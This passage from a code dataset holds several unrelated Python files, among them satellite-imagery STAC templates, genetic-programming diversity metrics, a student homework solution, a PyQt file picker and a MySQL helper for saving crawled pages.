os.path.isdir(dst_ds_path):\n os.mkdir(dst_ds_path)\n\n#---------------------------------------\n#train\ntrain_save_path = dst_ds_path + '/train'\nif not os.path.isdir(train_save_path):\n os.mkdir(train_save_path)\n\nfile_handle = open(src_path + \"/label.txt\", \"r\") \nlines = file_handle.readlines()\nfile_handle.close()\n\nprint(\"There are {} lines in label.txt. Is that 72824?\".format(len(lines)))\n\nc = 0\n\nfor line in lines:\n line = line.strip() # to erase blank\n line = line.strip('\\n') # to erase \\n\n line_list = line.split(':')\n \n src_img_filename = line_list[0]\n cls_name = line_list[1] \n \n src_file_path = src_path + '/images/' + src_img_filename\n\n dst_filename = cls_name + '_c' + str(random.randint(1,99)) + 's1_' + src_img_filename\n # dst_filename = cls_name + '_c1s1_' + src_img_filename\n dst_file_path = train_save_path + '/' + dst_filename\n \n shutil.move(src_file_path, dst_file_path)\n \n c += 1\n if c % 10000 == 0:\n print('{} files copied.'.format(c)) \n\nprint('train dataset completed. 
{} files copied.'.format(c))\n\n\n","sub_path":"tools/prepare_train-data.py","file_name":"prepare_train-data.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490483366","text":"from datetime import datetime\nfrom pystac.extensions.eo import Band, SummariesEOExtension\nfrom pystac.extensions.projection import SummariesProjectionExtension\n\nfrom pystac import (Catalog, Collection, Extent, Link, Provider, SpatialExtent,\n TemporalExtent, Summaries)\n\nspot_sensor = {\"S4\": \"SPOT 4\", \"S5\": \"SPOT 5\"}\n\nimage_types = {\n \"m20_1\": \"B1\",\n \"m20_2\": \"B2\",\n \"m20_3\": \"B3\",\n \"m20_4\": \"B4\",\n \"p10_1\": \"pan\"\n}\n\nproj_epsg = {f\"utm{str(i).zfill(2)}\": 26900 + i for i in range(1, 25)}\nproj_epsg[\"lcc00\"] = 3979\n\nspot_catalog = Catalog(\n id=\"nrcan-spot-ortho\",\n description=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n title=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n stac_extensions=None)\n\nspot45_catalog = Catalog(\n id=\"canada-spot-orthoimages\",\n description=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n title=\"STAC Catalog for orthorectified SPOT 4 and 5 data of Canada\",\n stac_extensions=None)\n\ngeobase_providers = [\n Provider(\n \"Government of Canada\",\n \"Natural Resources; Strategic Policy and Results Sector\",\n [\"licensor\", \"processor\"],\n \"https://open.canada.ca/data/en/dataset/d799c202-603d-4e5c-b1eb-d058803f80f9\"\n ),\n Provider(\"PCI Geomatics\", \"info@pci.com\", [\"processor\", \"host\"],\n \"www.pcigeomatics.com\"),\n Provider(\"Sparkgeo\", \"info@sparkegeo.com\", [\"processor\", \"host\"],\n \"www.sparkgeo.com\"),\n]\n\ngeobase_license = Link(\n \"license\",\n \"https://open.canada.ca/en/open-government-licence-canada\",\n \"text\",\n \"Open Government Licence Canada\",\n)\n\nspot_extents = Extent(\n SpatialExtent([[\n 35.324804300674494, -169.69075486542908, 68.02144065697097,\n -15.505275588132838\n ]]),\n TemporalExtent([[\n datetime.strptime(\"2005-05-01\", \"%Y-%m-%d\"),\n datetime.strptime(\"2010-10-31\", \"%Y-%m-%d\"),\n ]]),\n)\n\nspot_bands = {\n \"B1\":\n Band(\n dict(name=\"B1\",\n common_name=\"green\",\n description=\"Green: 500-590nm\",\n center_wavelength=0.545,\n full_width_half_max=0.09)),\n \"B2\":\n Band(\n dict(name=\"B2\",\n common_name=\"red\",\n description=\"Red: 610-680 nm\",\n center_wavelength=0.645,\n full_width_half_max=0.07)),\n \"B3\":\n Band(\n dict(name=\"B3\",\n common_name=\"nir\",\n description=\"Near Infrared: 780-890 nm\",\n center_wavelength=0.835,\n full_width_half_max=0.11)),\n \"B4\":\n Band(\n dict(name=\"B4\",\n common_name=\"swir16\",\n description=\"ShortWave Infrared: 1580-1750 nm\",\n center_wavelength=1.665,\n full_width_half_max=0.170)),\n}\n\nspot_pan = {\n \"S4\":\n Band(\n dict(name=\"pan\",\n common_name=\"pan\",\n description=\"Panchromatic: 610-680 nm\",\n center_wavelength=0.645,\n full_width_half_max=0.07)),\n \"S5\":\n Band(\n dict(name=\"pan\",\n common_name=\"pan\",\n description=\"Panchromatic: 480-710 nm\",\n center_wavelength=0.595,\n full_width_half_max=0.230))\n}\n\nspot4_collection = Collection(\n id=\"canada-spot4-orthoimages\",\n description=\"SPOT 4 orthoimages of Canada\",\n extent=spot_extents,\n title=\"SPOT 4 orthoimages of Canada\",\n stac_extensions=[\n \"https://stac-extensions.github.io/eo/v1.0.0/schema.json\",\n \"https://stac-extensions.github.io/projection/v1.0.0/schema.json\",\n ],\n 
license=\"Proprietery\",\n keywords=[\"SPOT\", \"Geobase\", \"orthoimages\"],\n providers=geobase_providers,\n summaries=Summaries(\n dict(\n platform=[\"SPOT 5\"],\n instruments=[\"HRVIR\"],\n constellation=[\"SPOT\"],\n gsd=[10, 20],\n )))\neo_ext = SummariesEOExtension(spot4_collection)\neo_ext.bands = list(spot_bands.values()) + [spot_pan[\"S4\"]]\nproj_ext = SummariesProjectionExtension(spot4_collection)\nproj_ext.epsg = list(proj_epsg.values())\n\nspot5_collection = Collection(\n id=\"canada-spot5-orthoimages\",\n description=\"SPOT 5 orthoimages of Canada\",\n extent=spot_extents,\n title=\"SPOT 5 orthoimages of Canada\",\n stac_extensions=[\n \"https://stac-extensions.github.io/eo/v1.0.0/schema.json\",\n \"https://stac-extensions.github.io/projection/v1.0.0/schema.json\",\n ],\n license=\"Proprietery\",\n keywords=[\"SPOT\", \"Geobase\", \"orthoimages\"],\n providers=geobase_providers,\n summaries=Summaries(\n dict(\n platform=[\"SPOT 5\"],\n instruments=[\"HVG\"],\n constellation=[\"SPOT\"],\n gsd=[2.5, 5, 10, 20],\n )))\neo_ext = SummariesEOExtension(spot5_collection)\neo_ext.bands = list(spot_bands.values()) + [spot_pan[\"S5\"]]\nproj_ext = SummariesProjectionExtension(spot5_collection)\nproj_ext.epsg = list(proj_epsg.values())\n\n\ndef build_root_catalog():\n spot4_collection.add_link(geobase_license)\n spot5_collection.add_link(geobase_license)\n spot_catalog.add_child(spot45_catalog)\n spot45_catalog.add_child(spot4_collection)\n spot45_catalog.add_child(spot5_collection)\n return spot_catalog\n","sub_path":"src/stactools/nrcan_spot_ortho/stac_templates.py","file_name":"stac_templates.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"427221583","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sys import maxsize\n\n\nfrom editdistance import eval\n\n# levenshtein distance between two genomes: used codons + tail\ndef genome_distance(ind1, ind2):\n return eval(ind1.genome, ind2.genome)\n \ndef genome_diff(ind1, ind2):\n return genome_distance(ind1, ind2) / max(len(ind1.genome), len(ind2.genome))\n \n# levenshtein distance between two effected regions in two genomes: used_codon + \ndef effective_region_distance(ind1, ind2):\n return eval(ind1.genome[:ind1.used_codons], ind2.genome[:ind2.used_codons])\n \ndef effective_region_diff(ind1, ind2):\n return effective_region_distance(ind1, ind2) / max(ind1.used_codons, ind2.used_codons)\n\n# genome disversity of the population \ndef genome_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n# diversity += genome_distance(population[i], population[j])\n diversity += genome_diff(population[i], population[j])\n \n # average the distance\n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n return diversity\n\n# population diveristy in terms of used_codons \ndef effective_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n# diversity += effected_region_distance(population[i], population[j])\n diversity += effective_region_diff(population[i], population[j])\n \n # average the distance\n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n return diversity\n\n\n\ndef hamming(list1, list2):\n if (len(list1) != len(list2)):\n return max(len(list1), len(list2))\n #assert len(list1) == len(list2)\n return sum(c1 != c2 for c1, c2 in zip(list1, list2))\n \n# use 
hamming distance for dissimilarity \ndef semantic_dissimilarity(ind1, ind2):\n if (len(ind1.semantic) == len(ind2.semantic) == 0):\n return 0.0\n \n return hamming(ind1.semantic, ind2.semantic) / max(len(ind1.semantic), len(ind2.semantic))\n \n \n# use mean absolute distance for semantic distance \ndef semantic_distance(ind1, ind2):\n \n if (len(ind1.semantic) == len(ind2.semantic) == 0):\n return 0.0 \n \n \n if len(ind1.semantic) == 0:\n return np.nanmean(ind2.semantic)\n elif len(ind2.semantic) == 0:\n return np.nanmean(ind1.semantic)\n else:\n return np.nanmean([abs(s1 - s2) for s1,s2 in zip(ind1.semantic, ind2.semantic)])\n\n \ndef semantic_diversity(population):\n diversity = 0.0\n for i in range(len(population)-1):\n for j in range(i+1, len(population)):\n #diversity += semantic_dissimilarity(population[i], population[j])\n diversity += semantic_distance(population[i], population[j])\n \n diversity = diversity / (len(population) * (len(population) - 1)) * 2\n \n diversity = round(diversity, 3)\n \n return diversity\n\n \ndef semantic_dispersion(population):\n semantic_array = np.array([ind.semantic for ind in population if len(ind.semantic) != 0])\n #print(semantic_array)\n \n #print(semantic_array.shape)\n \n semantic_mean = np.mean(semantic_array, axis=0)\n #print(\"Mean of semantic\", semantic_mean)\n #semantic_std = np.std(semantic_array, axis=0)\n \n # use ddof=1 to specify sample variance, rather than population variance (ddof=0))\n # semantic_var = np.var(semantic_array, axis=0, ddof=1)\n \n \n dispersion = 0.0\n \n for semantic in semantic_array:\n dispersion += np.sqrt(sum((semantic - semantic_mean)**2))\n \n dispersion /= len(semantic_array)\n \n dispersion = round(dispersion, 3)\n \n return dispersion\n \n# Tree edit distance between two individuals\n \n'''def tree_diversity(population):\n diversity = 0.0\n for i in range(len(population) - 1):\n for j in range(i+1, len(population)):\n diversity += population[i].tree_edit_distance(population[j])\n \n diversity = diversity / (len(population) * (len(population)-1)) * 2\n\n return diversity '''\n \ndef tree_diversity(population):\n diversity = 0.0\n best = max(population)\n for i in range(len(population)):\n diversity += population[i].tree_edit_distance(best)\n diversity = diversity / len(population)\n return diversity\n \n# Phenotype diversity = no. of unique fitnesses \ndef phenotype_diversity(population):\n unique_fitnesses = set([ind.fitness for ind in population])\n \n diversity = len(unique_fitnesses) / len(population)\n \n return diversity\n \n","sub_path":"src/operators/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530562542","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# Reorder the query based on results and relevance feedback\r\n# Simply call set_order with parameters of current query and the query results( with relevance feedback ) \r\n# to get best query for next iteration( reordered query )\r\n\r\nimport urllib2\r\nimport base64\r\nimport json\r\nimport sys\r\nimport string\r\nimport operator\r\nimport re\r\n\r\ndef set_order(keywords, results):\r\n matrix = dict()\r\n for word1 in keywords:\r\n matrix[word1] = dict()\r\n for word2 in keywords:\r\n if word2 != word1:\r\n matrix[word1][word2] = 0\r\n for item in results:\r\n #print word1.lower()+\".{0,17}\"+word2.lower()\r\n remode = word1.lower()+\".{1,5}\"+word2.lower()\r\n if 
re.search(remode,item[u'Description'].encode('utf-8').lower()) or re.search(remode,item[u'Title'].encode('utf-8').lower()):\r\n #print \"Got you!!!!\"\r\n if item[u'relevant']:\r\n matrix[word1][word2] = matrix[word1][word2] + 1\r\n else:\r\n matrix[word1][word2] = matrix[word1][word2] - 1\r\n best_query = keywords\r\n score = 0\r\n #print keywords\r\n for word1 in keywords:\r\n words_list = keywords[:]\r\n query = [word1]\r\n words_list.remove(word1)\r\n curr_word = word1\r\n while len(query) < len(keywords):\r\n #print query\r\n #print words_list\r\n word_to_add = None\r\n for word2 in words_list:\r\n if word2 not in query and ( word_to_add==None or ( matrix[curr_word].has_key(word2) and matrix[curr_word][word2]>matrix[curr_word][word_to_add] ) ):\r\n word_to_add = word2\r\n #print word_to_add\r\n query.append(word_to_add)\r\n words_list.remove(word_to_add)\r\n curr_word = word_to_add\r\n the_score = 0\r\n for i in range(len(query)-1):\r\n #print i\r\n the_score = the_score + matrix[query[i]][query[i+1]]\r\n #print the_score\r\n if the_score > score:\r\n best_query = query\r\n score = the_score\r\n return best_query\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n pass\r\n","sub_path":"keyword_order.py","file_name":"keyword_order.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271186035","text":"# Skeleton file for HW6 - Spring 2021 - extended intro to CS\r\n\r\n# Add your implementation to this file\r\n\r\n# You may add other utility functions to this file,\r\n# but you may NOT change the signature of the existing ones.\r\n\r\n# Change the name of the file to include your ID number (hw6_ID.py).\r\n\r\n# Enter all IDs of participating students as strings, separated by commas.\r\n\r\n# For example: SUBMISSION_IDS = [\"123456\", \"987654\"] if submitted in a pair or SUBMISSION_IDS = [\"123456\"] if submitted alone.\r\n\r\nSUBMISSION_IDS = [\"206962359\", \"316296771\"]\r\n\r\n\r\nimport random\r\n\r\n\r\n############\r\n# QUESTION 1\r\n############\r\n\r\n# Q1 a\r\ndef prefix_suffix_overlap(lst, k):\r\n\tresult_list = []\r\n\tfor i in range(len(lst)):\r\n\t\tfor j in range(len(lst)):\r\n\t\t\tif i != j:\r\n\t\t\t\tif (lst[i][:k] == lst[j][-k:]):\r\n\t\t\t\t\tresult_list.append((i,j))\r\n\treturn result_list\r\n\r\n\r\n# Q1 c\r\nclass Dict:\r\n\tdef __init__(self, m, hash_func=hash):\r\n\t\t\"\"\" initial hash table, m empty entries \"\"\"\r\n\t\tself.table = [[] for i in range(m)]\r\n\t\tself.hash_mod = lambda x: hash_func(x) % m\r\n\r\n\tdef __repr__(self):\r\n\t\tL = [self.table[i] for i in range(len(self.table))]\r\n\t\treturn \"\".join([str(i) + \" \" + str(L[i]) + \"\\n\" for i in range(len(self.table))])\r\n\r\n\tdef insert(self, key, value):\r\n\t\t\"\"\" insert key,value into table\r\n\t\t\tAllow repetitions of keys \"\"\"\r\n\t\ti = self.hash_mod(key) # hash on key only\r\n\t\titem = [key, value] # pack into one item\r\n\t\tself.table[i].append(item)\r\n\r\n\tdef find(self, key):\r\n\t\t\"\"\" returns ALL values of key as a list, empty list if none \"\"\"\r\n\t\tresult_lst = []\r\n\t\ti = self.hash_mod(key)\r\n\t\tfor curr in self.table[i]:\r\n\t\t\tif curr[0] == key:\r\n\t\t\t\tresult_lst.append(curr[1])\r\n\t\treturn result_lst\r\n\r\n\r\n\r\n# Q1 d\r\ndef prefix_suffix_overlap_hash1(lst, k):\r\n\tresult_lst = []\r\n\td = Dict(len(lst))\r\n\r\n\t# O(nk)\r\n\tfor i in range(len(lst)): # n iterations\r\n\t\td.insert(lst[i][:k],i) # O(k) - slicing, O(1) - insert(average)\r\n\r\n\t# 
O(nk)\r\n\tfor j in range(len(lst)): # n iterations\r\n\t\tmatch_indexes = d.find(lst[j][-k:]) # O(k) - slicing, O(1) - find(average)\r\n\t\tfor index in match_indexes: # Q1-e: never happens\r\n\t\t\tif index != j:\r\n\t\t\t\tresult_lst.append((index,j))\r\n\r\n\treturn result_lst # Q1-e: empty list\r\n\t\t\r\n\r\n\t\r\n############\r\n# QUESTION 2\r\n############\r\n\r\n# Q2 a\r\ndef powers_of_2():\r\n\tnumber = 1\r\n\twhile True:\r\n\t\tyield number # starting 2^0\r\n\t\tnumber = number * 2\r\n\r\n\r\n# Q2 b\r\ndef pi_approx_monte_carlo():\r\n\tpower_gen = powers_of_2()\r\n\tnum_inside, total_amount = 0,0\r\n\twhile True:\r\n\t\tcurr_power = next(power_gen)\r\n\t\tfor i in range(curr_power):\r\n\t\t\tx = random.random()\r\n\t\t\ty = random.random()\r\n\t\t\tif x**2 + y**2 <= 1.0:\r\n\t\t\t\tnum_inside +=1\r\n\t\ttotal_amount += curr_power\r\n\t\tyield (4*num_inside/total_amount)\r\n\r\n# Q2 c\r\ndef leibniz():\r\n\tn = 0\r\n\twhile True:\r\n\t\tyield ((-1)**n)/(2*n+1)\r\n\t\tn +=1\r\n\r\ndef infinite_series(gen):\r\n\tsum_of_gen = 0\r\n\tfor num in gen:\r\n\t\tsum_of_gen += num\r\n\t\tyield sum_of_gen\r\n\r\n\r\ndef pi_approx_leibniz():\r\n\tleb_gen = leibniz()\r\n\tsum_gen = infinite_series(leb_gen)\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tfor i in range(next(power_gen)-1):\r\n\t\t\tnext(sum_gen)\r\n\t\tyield 4*next(sum_gen)\r\n\r\n\r\n# Q2 d\r\ndef unit_slicing():\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tpower = next(power_gen)\r\n\t\tlst_res = [(i/power) for i in range(power)]\r\n\t\tyield lst_res\r\n\t\t\t\t\r\n\r\n\r\ndef integral(func, a, b):\r\n\tpower_gen = powers_of_2()\r\n\twhile True:\r\n\t\tintegral_sum = 0\r\n\t\tpower = next(power_gen)\r\n\t\twidth = (b-a)/ power\r\n\t\tfor i in range(power):\t \r\n\t\t\tintegral_sum += func(a+width*i)*((a+width*(i+1))-(a+width*i))\r\n\t\tyield integral_sum\r\n\r\ndef pi_approx_integral():\r\n\tintegral_gen = integral((lambda x: (1-x**2)**0.5),-1,1)\r\n\twhile True:\r\n\t\tyield 2* next(integral_gen)\r\n\r\n\r\n############\r\n# QUESTION 6\r\n############\r\n\r\n\r\n# Q6 c\r\ndef CYK_d(st, rule_dict, start_var):\r\n\t''' can string st be generated from grammar? 
'''\r\n\tn = len(st)\r\n\r\n\t# table for the dynamic programming algorithm\r\n\ttable = [[None for j in range(n+1)] for i in range(n)]\r\n\t#Initialize the relevant triangular region with empty sets\r\n\tfor i in range(n):\r\n\t\tfor j in range(i+1,n+1):\r\n\t\t\ttable[i][j] = [set(), \"none\"]\r\n\r\n\t# Fill the table cells representing substrings of length 1\r\n\tfill_length_1_cells_d(table, rule_dict, st)\r\n \r\n\t# Fill the table cells representing substrings of length >=2\r\n\tfor length in range(2, n+1):\r\n\t\tfor i in range(0, n-length+1):\r\n\t\t\tj = i+length\r\n\t\t\tfill_cell_d(table, i,j, rule_dict)\r\n\t\t\t\r\n\tif (start_var in table[0][n][0]) == False:\r\n\t\treturn -1\r\n\telse:\r\n\t\treturn table[0][n][1]\r\n\r\ndef fill_length_1_cells_d(table, rule_dict, st):\r\n\tn = len(st)\r\n\tfor i in range(n):\r\n\t\tfor lhs in rule_dict: # lhs is a single variable\r\n\t\t\tif st[i] in rule_dict[lhs]:\r\n\t\t\t # add variable lhs to T[i][i+1]\r\n\t\t\t table[i][i+1][0].add(lhs)\r\n\t\ttable[i][i+1][1] = 1\r\n\r\n\r\ndef fill_cell_d(table, i, j, rule_dict):\r\n\tfor k in range(i+1, j): # non trivial partitions of s[i:j]\r\n\t\tfor lhs in rule_dict: # lhs is a single variable\r\n\t\t\tfor rhs in rule_dict[lhs]:\r\n\t\t\t\tif len(rhs) == 2: # rule like A -> XY (not like A -> a)\r\n\t\t\t\t\tX, Y = rhs[0], rhs[1]\r\n\t\t\t\t\tif X in table[i][k][0] and Y in table[k][j][0]:\r\n\t\t\t\t\t\ttable[i][j][0].add(lhs)\r\n\t\t\t\t\t\tif table[i][j][1] == \"none\":\r\n\t\t\t\t\t\t\ttable[i][j][1] = max(1+table[i][k][1],1+table[k][j][1])\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\ttable[i][j][1] = min(table[i][j][1], max(1+table[i][k][1],1+table[k][j][1]))\r\n\r\n\r\n########\r\n# Tester\r\n########\r\n\r\ndef test():\r\n\timport math\r\n\r\n\t############\r\n\t# QUESTION 1\r\n\t############\r\n\r\n\t# Q1 a\r\n\tlst = [\"abcd\", \"cdab\", \"aaaa\", \"bbbb\", \"abff\"]\r\n\tk = 2\r\n\tif sorted(prefix_suffix_overlap(lst, k)) != sorted([(0, 1), (1, 0), (4, 1)]):\r\n\t\tprint(\"error in prefix_suffix_overlap\")\r\n\t# Q1 c\r\n\td = Dict(3)\r\n\td.insert(\"a\", 56)\r\n\td.insert(\"a\", 34)\r\n\tif sorted(d.find(\"a\")) != sorted([56, 34]) or d.find(\"b\") != []:\r\n\t\tprint(\"error in Dict.find\")\r\n\r\n \r\n\t# Q1 d\r\n\tlst = [\"abcd\", \"cdab\", \"aaaa\", \"bbbb\", \"abff\"]\r\n\tk = 2\r\n\tif sorted(prefix_suffix_overlap_hash1(lst, k)) != sorted([(0, 1), (1, 0), (4, 1)]):\r\n\t\tprint(\"error in prefix_suffix_overlap_hash1\")\r\n\r\n\r\n\r\n\t############\r\n\t# QUESTION 2\r\n\t############\r\n\r\n\t# Q2 a\r\n\tgen = powers_of_2()\r\n\tif [next(gen) for i in range(5)] != [1, 2, 4, 8, 16]:\r\n\t\tprint('error in powers_of_2')\r\n\t\r\n\r\n\t# Q2 b\r\n\tgen = pi_approx_monte_carlo()\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - math.pi) < abs(tenth_approx - math.pi) or \\\r\n\t\t\tabs(tenth_approx - math.pi) < abs(twentyth_approx - math.pi) or \\\r\n\t\t\tabs(twentyth_approx - math.pi) > 0.01:\r\n\t\tprint('error in pi_approx_monte_carlo')\r\n \r\n\t# Q2 c\r\n\tgen = leibniz()\r\n\tif [next(gen) for i in range(5)] != [1, -1/3, 1/5, -1/7, 1/9]:\r\n\t\tprint('error in leibniz')\r\n\r\n\tgen = infinite_series(powers_of_2())\r\n\tif [next(gen) for i in range(6)] != [1, 3, 7, 15, 31, 63]:\r\n\t\tprint('error in infinite_series')\r\n\r\n\tleibniz_formula = [1, -1/3, 1/5, -1/7, 1/9, -1/11, 1/13, -1/15, 1/17, -1/19, 1/21, -1/23, 1/25, -1/27, 
1/29]\r\n\tleibniz_sum_powers_of_2 = [4*leibniz_formula[0], 4*sum(leibniz_formula[:3]), 4*sum(leibniz_formula[:7]), 4*sum(leibniz_formula[:15])]\r\n\tgen = pi_approx_leibniz()\r\n\tfirst_4_sums = [next(gen) for i in range(4)]\r\n\t[next(gen) for i in range(5)]\r\n\ttenth_approx = next(gen)\r\n\tif first_4_sums != leibniz_sum_powers_of_2 or abs(tenth_approx - math.pi) > 1e-3:\r\n\t\tprint('error in pi_approx_leibniz')\r\n\r\n\t# Q2 d\r\n\tgen = unit_slicing()\r\n\tif [next(gen) for i in range(4)] != [[0.0], [0.0, 0.5], [0.0, 0.25, 0.5, 0.75], [0.0, 0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875]]:\r\n\t\tprint('error in unit_slicing')\r\n\r\n\tb = 10\r\n\ttrue_val = math.log(b)\r\n\tgen = integral(lambda x: 1 / x, 1, b)\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - true_val) < abs(tenth_approx - true_val) or \\\r\n\t\t\tabs(tenth_approx - true_val) < abs(twentyth_approx - true_val) or \\\r\n\t\t\tabs(twentyth_approx - true_val) > 1e-4:\r\n\t\tprint('error in integral')\r\n\t\r\n\tgen = pi_approx_integral()\r\n\tfirst_apporx = next(gen)\r\n\t[next(gen) for i in range(8)]\r\n\ttenth_approx = next(gen)\r\n\t[next(gen) for i in range(9)]\r\n\ttwentyth_approx = next(gen)\r\n\tif abs(first_apporx - math.pi) < abs(tenth_approx - math.pi) or \\\r\n\t\t\tabs(tenth_approx - math.pi) < abs(twentyth_approx - math.pi) or \\\r\n\t\t\tabs(twentyth_approx - math.pi) > 1e-5:\r\n\t\tprint('error in pi_approx_integral')\r\n\r\n\t############\r\n\t# QUESTION 6\r\n\t############\r\n\r\n\t# Q6 c\r\n\trule_dict = {\"S\": {\"AB\", \"BC\"}, \"A\": {\"BA\", \"a\"}, \"B\": {\"CC\", \"b\"}, \"C\": {\"AB\", \"a\"}}\r\n\tif CYK_d(\"baaba\", rule_dict, \"S\") != 4:\r\n\t\tprint(\"Error in CYK_d1\")\r\n\r\n\tif CYK_d(\"baab\", rule_dict, \"S\") != -1:\r\n\t\tprint(\"Error in CYK_d2\")\r\n\t\t","sub_path":"hw6_206962359_original.py","file_name":"hw6_206962359_original.py","file_ext":"py","file_size_in_byte":8634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"497921046","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nThis example shows a push button\nwhich opens a QFileDialog\nto choose a file.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\n\nimport sys\nimport os\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QPushButton, QFileDialog)\n\n\n\n\n\nclass Example(QWidget):\n\n\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n\n\n    def initUI(self):\n        self.setGeometry(300, 300, 280, 170)\n        self.setWindowTitle(\"File picker\")\n        btn = QPushButton(\"Choose a file\", self)\n        btn.clicked.connect(self.openFile)\n        btn.setGeometry(100, 50, 100, 40)\n\n        self.show()\n\n\n    def openFile(self):\n        name = QFileDialog.getOpenFileName(self, \"Choose file\")\n        print(name)\n\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = Example()\n    sys.exit(app.exec_())","sub_path":"PycharmProjects/qtDesigner/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175311242","text":"import os, sys, json, unittest\nfrom package.code.exceptions import *\nfrom package.code.logger import Logger \n\n\ndef loadSettings():\n    with open('package/settings.json', 'r') as jfile:\n        loaded_data = json.load(jfile)\n\n    curr_path = 
'/'.join(os.path.realpath(__file__).split('\\\\')[:-1])\n loaded_data['logpath'] = '{}/{}'.format(curr_path, loaded_data['logpath'])\n \n return loaded_data\n\ndef testModules():\n import package.test.LoggerTester as TestLogger\n loader = unittest.TestLoader()\n suite = unittest.TestSuite()\n\n suite.addTests(loader.loadTestsFromModule(TestLogger))\n\n runner = unittest.TextTestRunner(verbosity = 3)\n result = runner.run(suite)\n\nif __name__ == '__main__':\n settings = loadSettings()\n syslog = Logger(settings)\n syslog.logAction(\"Main initiated.\")\n \n try:\n for sysarg in sys.argv[1:]:\n if sysarg == '-t' or sysarg == '-test':\n syslog.logAction(\"Testing procedures initiated.\")\n testModules()\n syslog.logAction(\"Test fixtures executed successfully.\")\n elif sysarg == '-c' or sysarg == '-clear':\n with open(syslog.log_path, 'w') as lfile:\n lfile.write(\"\")\n syslog.logAction(\"Log file purged.\")\n else:\n raise MPArgvException\n except Exception as e:\n syslog.logAction(e)\n syslog.logAction(\"Ended with failure.\")\n finally:\n syslog.logAction('Main End.\\n')\n syslog.writeOut() \n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"25064244","text":"# -*- encoding=utf-8 -*-\n\nimport pymysql\n\n\ndef get_conn():\n conn = pymysql.connect(\n host=\"localhost\",\n port=3306,\n user=\"yjy\",\n passwd=\"yyyyyy\",\n db=\"yjy\",\n charset=\"utf8\"\n )\n return conn\n\n\ndef save(data):\n \"\"\"\n Insert into the database\n :param data: (dict) link: URL data: content\n :return:\n \"\"\"\n conn = get_conn()\n cur = conn.cursor()\n if data and data.get(\"data\"):\n try:\n sql = \"insert into cnblogs (c_link,c_data) values (%s, %s)\"\n cur.execute(sql, (data.get(\"link\"), data.get(\"data\")))\n except Exception as e:\n print(str(e)[:50])\n finally:\n conn.commit()\n cur.close()\n conn.close()\n\n\ndef check_link(link):\n \"\"\"\n Check whether the url meets the conditions and whether it is a duplicate\n :param link:\n :return: True: meets the conditions False: does not\n \"\"\"\n flag = False\n conn = get_conn()\n cur = conn.cursor()\n try:\n sql = 'select count(*) from cnblogs where c_link = %s'\n cur.execute(sql, (link,))\n res = cur.fetchone()\n if res[0] == 0:\n flag = True\n except Exception as e:\n print(str(e)[:50])\n finally:\n cur.close()\n conn.close()\n return flag\n\n\n","sub_path":"Web/Crawler/Cnblogs/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20130838","text":"\"\"\"Utilities.\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport functools\nimport re\n\nfrom Bio.File import as_handle\n\n\ndef report_bad_line(line_parser):\n    @functools.wraps(line_parser)\n    def wrapper(line):\n        try:\n            return line_parser(line)\n        except ValueError:\n            raise ValueError(\"Bad line: %r\" % line)\n    return wrapper\n\n\ndef sniff_region_format(fname):\n    \"\"\"Guess whether the file format is BED, Picard interval list, or text.\n\n    Returns the format name (str) or None if the file is empty.\n    \"\"\"\n    with as_handle(fname, 'rU') as handle:\n        for line in handle:\n            if not line.strip():\n                continue\n            if '\\t' not in line and ':' in line and '-' in line:\n                return 'text'\n            if line.startswith('@') or re.match('\\w+\\t\\d+\\t\\d+\\t(\\+|-|\\.)\\t\\S+',\n                                                line):\n                return 'interval'\n            if line.startswith('track') or line.count('\\t') > 1:\n                return 'bed'\n        raise ValueError(\"File \" + 
